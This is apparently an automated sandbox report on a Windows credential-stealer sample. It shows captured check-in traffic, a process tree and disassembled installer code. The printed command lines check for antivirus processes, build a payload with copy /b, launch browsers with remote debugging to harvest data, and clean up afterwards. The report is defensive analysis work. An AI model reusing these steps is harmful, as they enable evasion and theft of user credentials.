                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:30 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 59 43 32 4e 4f 38 51 31 44 4a 45 55 33 4f 38 39 30 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 43 32 4e 4f 38 51 31 44 4a 45 55 33 4f 38 39 30 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 43 32 4e 4f 38 51 31 44 4a 45 55 33 4f 38 39 30 52 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------NYC2NO8Q1DJEU3O890R9Content-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------NYC2NO8Q1DJEU3O890R9Content-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------NYC2NO8Q1DJEU3O890R9Cont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:31 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                                                                          Start time:11:22:01
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\mNPTwHOuvT.exe"
                                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                          File size:1'352'826 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:2DB319E8BFD0B40BB3AC999CF4E6670C
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                                                                          Start time:11:22:03
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c move Lou Lou.cmd & Lou.cmd
                                                                                                                                                                                                                                                                                                                          Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                                                                          Start time:11:22:03
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                                                                          Start time:11:22:03
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                                                                          Imagebase:0x6c0000
                                                                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                                                                          Start time:11:22:04
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                                                          Imagebase:0xf40000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:11:22:05
Start date:12/01/2025
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x6c0000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:11:22:05
Start date:12/01/2025
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0xf40000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:11:22:05
Start date:12/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 424372
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:11:22:06
Start date:12/01/2025
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "SYDNEY" Webmasters
Imagebase:0xf40000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:11:22:06
Start date:12/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Hero + ..\Spell + ..\Pensions + ..\Wants + ..\Mars U
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:11:22:06
Start date:12/01/2025
Path:C:\Users\user\AppData\Local\Temp\424372\Fine.com
Wow64 process (32bit):true
Commandline:Fine.com U
Imagebase:0x1d0000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:12
Start time:11:22:06
Start date:12/01/2025
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0xcc0000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:true

Target ID:15
Start time:11:22:51
Start date:12/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:11:22:52
Start date:12/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2136,i,8109458833846669920,3799157795582322690,262144 /prefetch:8
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:11:23:03
Start date:12/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:11:23:04
Start date:12/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:21
Start time:11:23:04
Start date:12/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2636,i,9989964858448437683,7276448006416970456,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:11:23:05
Start date:12/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:26
Start time:11:23:09
Start date:12/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3672 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:11:23:09
Start date:12/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5256 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:11:23:30
Start date:12/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HD2DTRQQ" & exit
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:11:23:30
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:11:23:31
Start date:12/01/2025
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:timeout /t 10
Imagebase:0x3c0000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:11:24:05
Start date:12/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1136 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Execution Graph

Execution Coverage:17.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21%
Total number of Nodes:1482
Total number of Limit Nodes:27
4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 
4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 
404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca 
GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 
3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f 
RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 